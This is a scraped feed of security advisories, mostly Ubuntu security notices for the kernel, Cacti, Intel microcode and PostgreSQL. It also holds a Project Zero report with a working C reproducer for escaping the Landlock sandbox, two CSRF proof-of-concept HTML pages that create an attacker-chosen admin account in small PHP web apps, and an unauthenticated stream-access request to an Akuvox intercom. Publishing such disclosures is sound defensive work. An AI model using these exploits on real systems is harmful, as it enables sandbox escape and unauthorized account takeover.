In the Linux kernel, vulnerabilities in netfilter, tls, and tty have been resolved.

Linux kernel vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

-   Ubuntu 20.04 LTS  
-   Ubuntu 18.04 LTS  
-   Ubuntu 16.04 LTS  
-   Ubuntu 22.04 LTS  
-   Ubuntu 14.04 LTS

Summary

Several security issues were fixed in the kernel.

Software Description

-   linux - Linux kernel  
-   linux-aws - Linux kernel for Amazon Web Services (AWS) systems  
-   linux-azure - Linux kernel for Microsoft Azure Cloud systems  
-   linux-gcp - Linux kernel for Google Cloud Platform (GCP) systems  
-   linux-gke - Linux kernel for Google Container Engine (GKE) systems  
-   linux-gkeop - Linux kernel for Google Container Engine (GKE) systems  
-   linux-ibm - Linux kernel for IBM cloud systems  
-   linux-oracle - Linux kernel for Oracle Cloud systems

Details

In the Linux kernel, the following vulnerability has been  
resolved: netfilter: nf_tables: disallow timeout for anonymous sets  
Never used from userspace, disallow these parameters.(CVE-2023-52620)

In the Linux kernel, the following vulnerability has been  
resolved: tls: fix race between tx work scheduling and socket close  
Similarly to previous commit, the submitting thread (recvmsg/sendmsg)  
may exit as soon as the async crypto handler calls complete(). Reorder  
scheduling the work before calling complete(). This seems more logical  
in the first place, as it’s the inverse order of what the submitting  
thread will do.(CVE-2024-26585)

In the Linux kernel, the following vulnerability has been  
resolved: tty: n_gsm: fix possible out-of-bounds in gsm0_receive()  
Assuming the following: - side A configures the n_gsm in basic option  
mode - side B sends the header of a basic option mode frame with data  
length 1 - side A switches to advanced option mode - side B sends 2 data  
bytes which exceeds gsm->len Reason: gsm->len is not used in advanced  
option mode. - side A switches to basic option mode - side B keeps  
sending until gsm0_receive() writes past gsm->buf Reason: Neither  
gsm->state nor gsm->len have been reset after reconfiguration. Fix this  
by changing gsm->count to gsm->len comparison from equal to less than.  
Also add upper limit checks against the constant MAX_MRU in  
gsm0_receive() and gsm1_receive() to harden against memory corruption of  
gsm->len and gsm->mru. All other checks remain as we still need to limit  
the data according to the user configuration and actual payload size.]  
(CVE-2024-36016)

Update instructions

The problem can be corrected by updating your kernel livepatch to the  
following versions:

Ubuntu 20.04 LTS  
    aws - 106.1  
    azure - 106.1  
    gcp - 106.1  
    generic - 106.1  
    gkeop - 106.1  
    ibm - 106.1  
    lowlatency - 106.1  
    oracle - 106.1

Ubuntu 18.04 LTS  
    aws - 106.1  
    azure - 106.1  
    gcp - 106.1  
    generic - 106.1  
    lowlatency - 106.1  
    oracle - 106.1

Ubuntu 16.04 LTS  
    aws - 106.1  
    azure - 106.1  
    gcp - 106.1  
    generic - 106.1  
    lowlatency - 106.1

Ubuntu 22.04 LTS  
    aws - 106.1  
    azure - 106.1  
    gcp - 106.1  
    generic - 106.1  
    gke - 106.1  
    ibm - 106.1  
    oracle - 106.1

Ubuntu 14.04 LTS  
    generic - 106.1  
    lowlatency - 106.1

Support Information

Livepatches for supported LTS kernels will receive upgrades for a period  
of up to 13 months after the build date of the kernel.

Livepatches for supported HWE kernels which are not based on an LTS  
kernel version will receive upgrades for a period of up to 9 months  
after the build date of the kernel, or until the end of support for that  
kernel’s non-LTS distro release version, whichever is sooner.

References

-   CVE-2023-52620  
-   CVE-2024-26585  
-   CVE-2024-36016

Kernel Live Patch Security Notice LSN-0106-1

Ubuntu Security Notice 6969-1 - It was discovered that Cacti did not properly apply checks to the "Package Import" feature. An attacker could possibly use this issue to perform arbitrary code execution. This issue only affected Ubuntu 24.04 LTS, Ubuntu 22.04 LTS, Ubuntu 20.04 LTS and Ubuntu 18.04 LTS. It was discovered that Cacti did not properly sanitize values when using javascript based API. A remote attacker could possibly use this issue to inject arbitrary javascript code resulting into cross-site scripting vulnerability. This issue only affected Ubuntu 24.04 LTS.

==========================================================================  
Ubuntu Security Notice USN-6969-1  
August 20, 2024

cacti vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.04 LTS  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 LTS  
- Ubuntu 14.04 LTS

Summary:

Several security issues were fixed in Cacti.

Software Description:  
- cacti: web interface for graphing of monitoring systems

Details:

It was discovered that Cacti did not properly apply checks to the "Package  
Import" feature. An attacker could possibly use this issue to perform  
arbitrary code execution. This issue only affected Ubuntu 24.04 LTS, Ubuntu  
22.04 LTS, Ubuntu 20.04 LTS and Ubuntu 18.04 LTS. (CVE-2024-25641)

It was discovered that Cacti did not properly sanitize values when using  
javascript based API. A remote attacker could possibly use this issue to  
inject arbitrary javascript code resulting into cross-site scripting  
vulnerability. This issue only affected Ubuntu 24.04 LTS. (CVE-2024-29894)

It was discovered that Cacti did not properly sanitize values when managing  
data queries. A remote attacker could possibly use this issue to inject  
arbitrary javascript code resulting into cross-site scripting  
vulnerability. (CVE-2024-31443)

It was discovered that Cacti did not properly sanitize values when reading  
tree rules with Automation API. A remote attacker could possibly use this  
issue to inject arbitrary javascript code resulting into cross-site  
scripting vulnerability. (CVE-2024-31444)

It was discovered that Cacti did not properly sanitize  
"get_request_var('filter')" values in the "api_automation.php" file. A  
remote attacker could possibly use this issue to perform SQL injection  
attacks. This issue only affected Ubuntu 24.04 LTS, Ubuntu 22.04 LTS,  
Ubuntu 20.04 LTS and Ubuntu 18.04 LTS. (CVE-2024-31445)

It was discovered that Cacti did not properly sanitize data stored in  
"form_save()" function in the "graph_template_inputs.php" file. A remote  
attacker could possibly use this issue to perform SQL injection attacks.  
(CVE-2024-31458)

It was discovered that Cacti did not properly validate the file urls from  
the lib/plugin.php file. An attacker could possibly use this issue to  
perform arbitrary code execution. (CVE-2024-31459)

It was discovered that Cacti did not properly validate the data stored in  
the "automation_tree_rules.php". A remote attacker could possibly use this  
issue to perform SQL injection attacks. This issue only affected Ubuntu  
24.04 LTS, Ubuntu 22.04 LTS, Ubuntu 20.04 LTS and Ubuntu 18.04 LTS.  
(CVE-2024-31460)

It was discovered that Cacti did not properly verify the user password.  
An attacker could possibly use this issue to bypass authentication  
mechanism. This issue only affected Ubuntu 24.04 LTS, Ubuntu 22.04 LTS,  
Ubuntu 20.04 LTS and Ubuntu 18.04 LTS. (CVE-2024-34360)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
  cacti                           1.2.26+ds1-1ubuntu0.1

Ubuntu 22.04 LTS  
  cacti                           1.2.19+ds1-2ubuntu1.1

Ubuntu 20.04 LTS  
  cacti                           1.2.10+ds1-1ubuntu1.1

Ubuntu 18.04 LTS  
  cacti                           1.1.38+ds1-1ubuntu0.1~esm3  
                                  Available with Ubuntu Pro

Ubuntu 16.04 LTS  
  cacti                           0.8.8f+ds1-4ubuntu4.16.04.2+esm2  
                                  Available with Ubuntu Pro

Ubuntu 14.04 LTS  
  cacti                           0.8.8b+dfsg-5ubuntu0.2+esm2  
                                  Available with Ubuntu Pro

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6969-1  
  CVE-2024-25641, CVE-2024-29894, CVE-2024-31443, CVE-2024-31444,  
  CVE-2024-31445, CVE-2024-31458, CVE-2024-31459, CVE-2024-31460,  
  CVE-2024-34340

Package Information:  
  https://launchpad.net/ubuntu/+source/cacti/1.2.26+ds1-1ubuntu0.1  
  https://launchpad.net/ubuntu/+source/cacti/1.2.19+ds1-2ubuntu1.1  
  https://launchpad.net/ubuntu/+source/cacti/1.2.10+ds1-1ubuntu1.1

Ubuntu Security Notice USN-6969-1

Ubuntu Security Notice 6967-1 - It was discovered that some Intel® Core™ Ultra Processors did not properly isolate the stream cache. A local authenticated user could potentially use this to escalate their privileges. It was discovered that some Intel® Processors did not properly isolate the stream cache. A local authenticated user could potentially use this to escalate their privileges. It was discovered that some Intel® Processors did not correctly transition between the executive monitor and SMI transfer monitor. A privileged local attacker could use this to escalate their privileges.

==========================================================================  
Ubuntu Security Notice USN-6967-1  
August 19, 2024

intel-microcode vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.04 LTS  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 LTS

Summary:

Several security issues were fixed in Intel Microcode.

Software Description:  
- intel-microcode: Processor microcode for Intel CPUs

Details:

It was discovered that some Intel® Core™ Ultra Processors did not properly  
isolate the stream cache. A local authenticated user could potentially use  
this to escalate their privileges. (CVE-2023-42667)

It was discovered that some Intel® Processors did not properly isolate the  
stream cache. A local authenticated user could potentially use this to  
escalate their privileges. (CVE-2023-49141)

It was discovered that some Intel® Processors did not correctly transition  
between the executive monitor and SMI transfer monitor (STM). A privileged  
local attacker could use this to escalate their privileges.  
(CVE-2024-24853)

It was discovered that some 3rd, 4th, and 5th Generation Intel® Xeon®  
Processors failed to properly implement a protection mechanism. A local  
attacker could use this to potentially escalate their privileges.  
(CVE-2024-24980)

It was discovered that some 3rd Generation Intel Xeon Scalable Processors  
did not properly handle mirrored regions with different values. A  
privileged local user could use this to cause a denial of service (system  
crash). (CVE-2024-25939)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
  intel-microcode                 3.20240813.0ubuntu0.24.04.2

Ubuntu 22.04 LTS  
  intel-microcode                 3.20240813.0ubuntu0.22.04.2

Ubuntu 20.04 LTS  
  intel-microcode                 3.20240813.0ubuntu0.20.04.2

Ubuntu 18.04 LTS  
  intel-microcode                 3.20240813.0ubuntu0.18.04.1+esm2  
                                  Available with Ubuntu Pro

Ubuntu 16.04 LTS  
  intel-microcode                 3.20240813.0ubuntu0.16.04.1+esm2  
                                  Available with Ubuntu Pro

After a standard system update you need to reboot your computer to make  
all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6967-1  
  CVE-2023-42667, CVE-2023-49141, CVE-2024-24853, CVE-2024-24980,  
  CVE-2024-25939

Package Information:  
  https://launchpad.net/ubuntu/+source/intel-microcode/3.20240813.0ubuntu0.24.04.2  
  https://launchpad.net/ubuntu/+source/intel-microcode/3.20240813.0ubuntu0.22.04.2  
  https://launchpad.net/ubuntu/+source/intel-microcode/3.20240813.0ubuntu0.20.04.2

Ubuntu Security Notice USN-6967-1

Akuvox Smart Intercom/Doorphone suffers from an unauthenticated live stream disclosure when requesting video.cgi endpoint on port 8080. Many versions are affected.

    Akuvox Smart Intercom/Doorphone Unauthenticated Stream DisclosureVendor: The Akuvox CompanyProduct web page: https://www.akuvox.comAffected version: Doorphone:                    S539                    S532                    X916                    X915                    X912                    R29                  Intercom:                    R20K-2                    R20A-2                    C313W-2                    NS-2                    NC-2                    NX-2                  Firmware: 912.30.1.137Summary: Vandal-resistant Door Phone for High-end Buildings. Offeringtop-of-the-line features, Akuvox X912 is targeted at high-end residentialand commercial projects. With a compact size, it is perfect for buildingswith limited installation space.Desc: The application suffers from an unauthenticated live stream disclosurewhen requesting video.cgi endpoint on port 8080.Tested on: lighttpd/1.4.30           EasyHttpServerVulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2024-5826Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5826.php25.02.2024--$ firefox http://192.168.1.2:8080/video.cgi

Akuvox Smart Intercom/Doorphone Unauthenticated Stream Disclosure

Linux has an issue where landlock can be disabled thanks to a missing cred_transfer hook.

    Linux: landlock can be disabled thanks to missing cred_transfer hook; and Smack looks dodgy tooI found a logic bug that makes it possible for a process to get rid of all Landlock restrictions applied to it:When a process' cred struct is replaced, this _almost_ always invokes the cred_prepare LSM hook; but in one special case (when KEYCTL_SESSION_TO_PARENT updates the parent's credentials), the cred_transfer LSM hook is used instead. Landlock only implements the cred_prepare hook, not cred_transfer, so KEYCTL_SESSION_TO_PARENT causes all information on Landlock restrictions to be lost.The one piece of good news about this is that it requires access to the keyctl() syscall; and I think Landlock is typically used in combination with some kind of seccomp allowlist, which will probably _usually_ make this issue unreachable from sandboxed code?I had a look at the other LSMs that have cred_prepare or cred_transfer hooks: - AppArmor handles both hooks in the same way, that's fine - SELinux handles both hooks in the same way, that's fine - Tomoyo only handles cred_prepare, not cred_transfer, but it only uses the   hook for something weird that's unrelated to the actual cred structs, so   that's probably fine - Smack handles both but handles them differently; smack_cred_transfer() only   transfers a subset of the information that smack_cred_prepare() transfers.   That looks a bit dodgy to me but I don't really understand Smack - Casey, can   you check if Smack handles KEYCTL_SESSION_TO_PARENT correctly?I will send a suggested fix for Landlock in a minute.Here's a reproducer for escaping from Landlock confinement, tested on latestmainline (at commit 786c8248dbd33a5a7a07f7c6e55a7bfc68d2ca48):```user@vm:~/landlock-houdini$ cat landlock-houdini.c#define _GNU_SOURCE#include <unistd.h>#include <err.h>#include <stdint.h>#include <stdlib.h>#include <fcntl.h>#include <stdio.h>#include <sys/prctl.h>#include <sys/wait.h>#include <sys/syscall.h>#include <linux/keyctl.h>/* stuff from the landlock header */struct landlock_ruleset_attr {        uint64_t handled_access_fs;};#define LANDLOCK_ACCESS_FS_WRITE_FILE                   (1ULL << 1)#define SYSCHK(x) ({          \\  typeof(x) __res = (x);      \\  if (__res == (typeof(x))-1) \\    err(1, \"SYSCHK(\" #x \")\"); \\  __res;                      \\})int main(void) {  /* == tell landlock to block opening any files for writing == */  SYSCHK(prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0));        struct landlock_ruleset_attr ruleset_attr = {                .handled_access_fs = LANDLOCK_ACCESS_FS_WRITE_FILE        };  int ruleset = SYSCHK(syscall(444/*__NR_landlock_create_ruleset*/, &ruleset_attr, sizeof(ruleset_attr), 0));  SYSCHK(syscall(446/*__NR_landlock_restrict_self*/, ruleset, 0));  /* == make sure we really can't open files for writing == */  int open_res = open(\"/dev/null\", O_WRONLY);  if (open_res != -1)    errx(1, \"open for write still worked after sandboxing???\");  perror(\"open for write failed as expected\");  /* == try to escape from landlock == */  /* needed for KEYCTL_SESSION_TO_PARENT permission checks */  SYSCHK(syscall(__NR_keyctl, KEYCTL_JOIN_SESSION_KEYRING, NULL, 0, 0, 0));  pid_t child = SYSCHK(fork());  if (child == 0) {    /*     * KEYCTL_SESSION_TO_PARENT is a no-op unless we have a different session     * keyring in the child, so make that happen.     */    SYSCHK(syscall(__NR_keyctl, KEYCTL_JOIN_SESSION_KEYRING, NULL, 0, 0, 0));    /*     * This is where the magic happens:     * KEYCTL_SESSION_TO_PARENT installs credentials on the parent that     * never go through the cred_prepare hook, this path uses cred_transfer     * instead.     * So basically after this call, the parent's landlock restrictions     * are gone.     */    SYSCHK(syscall(__NR_keyctl, KEYCTL_SESSION_TO_PARENT, 0, 0, 0, 0));    exit(0);  }  int wstatus;  SYSCHK(waitpid(child, &wstatus, 0));  if (!WIFEXITED(wstatus) || WEXITSTATUS(wstatus) != 0)    errx(1, \"child failed unexpectedly, unable to test bug\");  /* retry the same operation that was previously blocked to see if we escaped */  int open_res2 = open(\"/dev/null\", O_WRONLY);  if (open_res2 != -1)    errx(1, \"open for write works again, VULNERABLE!\");  perror(\"open for write failed as it should, seems fixed\");}user@vm:~/landlock-houdini$ gcc -o landlock-houdini landlock-houdini.c -Walluser@vm:~/landlock-houdini$ ./landlock-houdiniopen for write failed as expected: Permission deniedlandlock-houdini: open for write works again, VULNERABLE!user@vm:~/landlock-houdini$```This bug is subject to a 90-day disclosure deadline. If a fix for thisissue is made available to users before the end of the 90-day deadline,this bug report will become public 30 days after the fix was madeavailable. Otherwise, this bug report will become public at the deadline.The scheduled deadline is 2024-10-22.For more details, see the Project Zero vulnerability disclosure policy:https://googleprojectzero.blogspot.com/p/vulnerability-disclosure-policy.htmlRelated CVE Numbers: CVE-2024-42318.Found by: jannh@google.com

Linux Landlock Logic Bug

Ubuntu Security Notice 6968-1 - Noah Misch discovered that PostgreSQL incorrectly handled certain SQL objects. An attacker could possibly use this issue to execute arbitrary SQL functions as the superuser.

==========================================================================  
Ubuntu Security Notice USN-6968-1  
August 19, 2024

postgresql-12, postgresql-14, postgresql-16 vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.04 LTS  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

PostgreSQL could execute arbitrary SQL functions as the superuser  
if it received a specially crafted SQL object.

Software Description:  
- postgresql-16: Object-relational SQL database  
- postgresql-14: Object-relational SQL database  
- postgresql-12: Object-relational SQL database

Details:

Noah Misch discovered that PostgreSQL incorrectly handled certain  
SQL objects. An attacker could possibly use this issue to execute  
arbitrary SQL functions as the superuser.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
  postgresql-16                   16.4-0ubuntu0.24.04.1  
  postgresql-client-16            16.4-0ubuntu0.24.04.1

Ubuntu 22.04 LTS  
  postgresql-14                   14.13-0ubuntu0.22.04.1  
  postgresql-client-14            14.13-0ubuntu0.22.04.1

Ubuntu 20.04 LTS  
  postgresql-12                   12.20-0ubuntu0.20.04.1  
  postgresql-client-12            12.20-0ubuntu0.20.04.1

This update uses a new upstream release, which includes additional bug  
fixes. After a standard system update you need to restart PostgreSQL to  
make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6968-1  
  CVE-2024-7348

Package Information:  
  https://launchpad.net/ubuntu/+source/postgresql-16/16.4-0ubuntu0.24.04.1  
  https://launchpad.net/ubuntu/+source/postgresql-14/14.13-0ubuntu0.22.04.1  
  https://launchpad.net/ubuntu/+source/postgresql-12/12.20-0ubuntu0.20.04.1

Ubuntu Security Notice USN-6968-1

Lost and Found Information System version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : Lost and Found Information System v1.0 v1.0 CSRF Vulnerability                                                              |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-lfis.zip                                          |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following JavaScript code :

   creating a POST request using JavaScript to send certain data to a local server via HTTP. Here are the key points:

[+] Create an XMLHttpRequest object:

    xhr = new XMLHttpRequest(); Creates an XMLHttpRequest object that is used to send requests to the server.

[+] Open the request:

    xhr.open("POST", "http://127.0.0.1/php-lfis/classes/Users.php?f=save", true); Opens a connection to the specified URL (in this case, a local server)   
  using the HTTP method "POST".

[+] Set the request headers:

    xhr.setRequestHeader("Accept", "*/*"); Specifies that the request accepts any type of response.  
    xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); Specifies that the request accepts responses in English.  
    xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------"); Specifies the content type of the request   
  as multipart/form-data with specified boundaries.

[+] Enable sending cookies:

    xhr.withCredentials = true; Specifies that cookies should be sent with the request.

[+] Setting up the request data:

    The body is set up using a string containing the form data parts. Each part contains information such as username, password, and type.

    This string is converted to a Uint8Array and then to a Blob to be sent.

[+] Sending the request:

    xhr.send(new Blob([aBody])); Sends the data to the server.

[+] User Interface:  
    There is a button inside the HTML form that calls the submitRequest() function when clicked, which executes the request.

[+] Go to the line 6. Set the target site link Save changes and apply . 

[+] infected file : Users.php.

[+] Line 15 : Choose a name "indoushka".

[+] Line 19 : Choose a pass "Hacked".

[+] save code as poc.html 

[+] payload : 

<!DOCTYPE html>   
<html>   
<body>  
 <script> function submitRequest()   
 { var xhr = new XMLHttpRequest();   
 xhr.open("POST", "http:\/\/127.0.0.1\/php-lfis\/classes\/Users.php?f=save", true);   
 xhr.setRequestHeader("Accept", "*\/*");   
 xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");  
 xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------");  
 xhr.withCredentials = true;   
 var body =  
 "-----------------------------\r\n" +   
 "Content-Disposition: form-data; name=\"username\"\r\n" +   
 "\r\n" +   
 "indoushka\r\n" +   
 "-----------------------------\r\n" +   
 "Content-Disposition: form-data; name=\"password\"\r\n" +   
 "\r\n" +   
 "Hacked\r\n" +   
 "-----------------------------\r\n" +   
 "Content-Disposition: form-data; name=\"type\"\r\n" +   
 "\r\n" +   
 "1\r\n" +   
 "-------------------------------\r\n";   
 var aBody = new Uint8Array(body.length);   
 for (var i = 0; i < aBody.length; i++)   
 aBody[i] = body.charCodeAt(i);   
 xhr.send(new Blob([aBody]));   
 }  
 </script>  
 <form action="#">  
 <input type="button" value="Submit request" onclick="submitRequest();" />  
 </form>   
 </body>   
 </html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Lost and Found Information System 1.0 Cross Site Request Forgery

Loan Management System version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : Loan Management System 1.0 CSRF Vulnerability                                                                               |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/loan-management-system.zip                            |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] This HTML page :

    is a  user registration form that allows users to input a username, password, and upload an avatar image.   
  The form data is then sent via an AJAX request to a server-side script for processing.

[+] Here's a breakdown of how it works:

    HTML Structure

    Form Elements:

          username: A text field where the user can input their username.  
        password: A password field for entering a password.  
        img: A file input for uploading an avatar image (restricted to image file types).

    Save User Button:

          An input element with the type button is used to trigger the saveUser() function when clicked.

[+] JavaScript (AJAX Request)

        AJAX Request:

          An XMLHttpRequest object (xhr) is used to send the form data to a server-side script (Users.php).  
        The request method is POST, and the data is sent to the specified URL.  
        The onload function checks if the request was successful (status code 200). If it was,  
    it alerts the user that the save was successful; otherwise, it alerts the user of an error.

[+] save code as poc.html 

[+] payload : 

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>User Registration</title>  
</head>  
<body>

    <h2>User Registration</h2>  
    <form id="userForm" enctype="multipart/form-data">  
        <label for="username">Username:</label>  
        <input type="text" id="username" name="username" required><br><br>

        <label for="password">Password:</label>  
        <input type="password" id="password" name="password" required><br><br>

        <input type="button" value="Save User" onclick="saveUser()">  
    </form>

    <script>  
        function saveUser() {  
            var form = document.getElementById('userForm');  
            var formData = new FormData(form);

            var xhr = new XMLHttpRequest();  
            xhr.open("POST", "http://127.0.0.1/loan/ajax.php?action=save_user", true);

            xhr.onload = function () {  
                if (xhr.status === 200) {  
                    alert('User saved successfully');  
                } else {  
                    alert('An error occurred while saving the user');  
                }  
            };

            xhr.send(formData);  
        }  
    </script>

</body>  
</html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Loan Management System 1.0 Cross Site Request Forgery

Ubuntu Security Notice 6951-3 - Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-6951-3August 19, 2024linux-azure-5.4 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 18.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-azure-5.4: Linux kernel for Microsoft Azure cloud systemsDetails:Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:   - ARM64 architecture;   - M68K architecture;   - User-Mode Linux (UML);   - x86 architecture;   - Accessibility subsystem;   - Character device driver;   - Clock framework and drivers;   - CPU frequency scaling framework;   - Hardware crypto device drivers;   - Buffer Sharing and Synchronization framework;   - FireWire subsystem;   - GPU drivers;   - HW tracing;   - Macintosh device drivers;   - Multiple devices driver;   - Media drivers;   - Network drivers;   - Pin controllers subsystem;   - S/390 drivers;   - SCSI drivers;   - SoundWire subsystem;   - Greybus lights staging drivers;   - TTY drivers;   - Framebuffer layer;   - Virtio drivers;   - 9P distributed file system;   - eCrypt file system;   - EROFS file system;   - Ext4 file system;   - F2FS file system;   - JFFS2 file system;   - Network file system client;   - NILFS2 file system;   - SMB network file system;   - Kernel debugger infrastructure;   - IRQ subsystem;   - Tracing infrastructure;   - Dynamic debug library;   - 9P file system network protocol;   - Bluetooth subsystem;   - Networking core;   - IPv4 networking;   - IPv6 networking;   - Netfilter;   - NET/ROM layer;   - NFC subsystem;   - NSH protocol;   - Open vSwitch;   - Phonet protocol;   - TIPC protocol;   - Unix domain sockets;   - Wireless networking;   - eXpress Data Path;   - XFRM subsystem;   - ALSA framework;(CVE-2024-36934, CVE-2024-38578, CVE-2024-38600, CVE-2024-27399,CVE-2024-39276, CVE-2024-38596, CVE-2024-36933, CVE-2024-36919,CVE-2024-35976, CVE-2024-37356, CVE-2023-52585, CVE-2024-38558,CVE-2024-38560, CVE-2024-38634, CVE-2024-36959, CVE-2024-38633,CVE-2024-36886, CVE-2024-27398, CVE-2024-39493, CVE-2024-26886,CVE-2024-31076, CVE-2024-38559, CVE-2024-38615, CVE-2024-36971,CVE-2024-38627, CVE-2024-36964, CVE-2024-38780, CVE-2024-37353,CVE-2024-38621, CVE-2024-36883, CVE-2024-39488, CVE-2024-38661,CVE-2024-36939, CVE-2024-38589, CVE-2024-38565, CVE-2024-38381,CVE-2024-35947, CVE-2024-36905, CVE-2022-48772, CVE-2024-36017,CVE-2024-36946, CVE-2024-27401, CVE-2024-38579, CVE-2024-38612,CVE-2024-38598, CVE-2024-38635, CVE-2024-38587, CVE-2024-38567,CVE-2024-38549, CVE-2024-36960, CVE-2023-52752, CVE-2024-27019,CVE-2024-38601, CVE-2024-39489, CVE-2024-39467, CVE-2023-52882,CVE-2024-38583, CVE-2024-39480, CVE-2024-38607, CVE-2024-36940,CVE-2024-38659, CVE-2023-52434, CVE-2024-36015, CVE-2024-38582,CVE-2024-36950, CVE-2024-38552, CVE-2024-33621, CVE-2024-36954,CVE-2024-39475, CVE-2024-39301, CVE-2024-38599, CVE-2024-36902,CVE-2024-36286, CVE-2024-38613, CVE-2024-38637, CVE-2024-36941,CVE-2024-36014, CVE-2024-38618, CVE-2024-36904, CVE-2024-36270,CVE-2024-39292, CVE-2024-39471, CVE-2022-48674)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 18.04 LTS   linux-image-5.4.0-1135-azure    5.4.0-1135.142~18.04.1                                   Available with Ubuntu Pro   linux-image-azure               5.4.0.1135.142~18.04.1                                   Available with Ubuntu ProAfter a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6951-3   https://ubuntu.com/security/notices/USN-6951-2   https://ubuntu.com/security/notices/USN-6951-1   CVE-2022-48674, CVE-2022-48772, CVE-2023-52434, CVE-2023-52585,   CVE-2023-52752, CVE-2023-52882, CVE-2024-26886, CVE-2024-27019,   CVE-2024-27398, CVE-2024-27399, CVE-2024-27401, CVE-2024-31076,   CVE-2024-33621, CVE-2024-35947, CVE-2024-35976, CVE-2024-36014,   CVE-2024-36015, CVE-2024-36017, CVE-2024-36270, CVE-2024-36286,   CVE-2024-36883, CVE-2024-36886, CVE-2024-36902, CVE-2024-36904,   CVE-2024-36905, CVE-2024-36919, CVE-2024-36933, CVE-2024-36934,   CVE-2024-36939, CVE-2024-36940, CVE-2024-36941, CVE-2024-36946,   CVE-2024-36950, CVE-2024-36954, CVE-2024-36959, CVE-2024-36960,   CVE-2024-36964, CVE-2024-36971, CVE-2024-37353, CVE-2024-37356,   CVE-2024-38381, CVE-2024-38549, CVE-2024-38552, CVE-2024-38558,   CVE-2024-38559, CVE-2024-38560, CVE-2024-38565, CVE-2024-38567,   CVE-2024-38578, CVE-2024-38579, CVE-2024-38582, CVE-2024-38583,   CVE-2024-38587, CVE-2024-38589, CVE-2024-38596, CVE-2024-38598,   CVE-2024-38599, CVE-2024-38600, CVE-2024-38601, CVE-2024-38607,   CVE-2024-38612, CVE-2024-38613, CVE-2024-38615, CVE-2024-38618,   CVE-2024-38621, CVE-2024-38627, CVE-2024-38633, CVE-2024-38634,   CVE-2024-38635, CVE-2024-38637, CVE-2024-38659, CVE-2024-38661,   CVE-2024-38780, CVE-2024-39276, CVE-2024-39292, CVE-2024-39301,   CVE-2024-39467, CVE-2024-39471, CVE-2024-39475, CVE-2024-39480,   CVE-2024-39488, CVE-2024-39489, CVE-2024-39493

Ubuntu Security Notice USN-6951-3

Simple Machines Forum version 2.1.4 suffers from an authenticated code injection vulnerability.

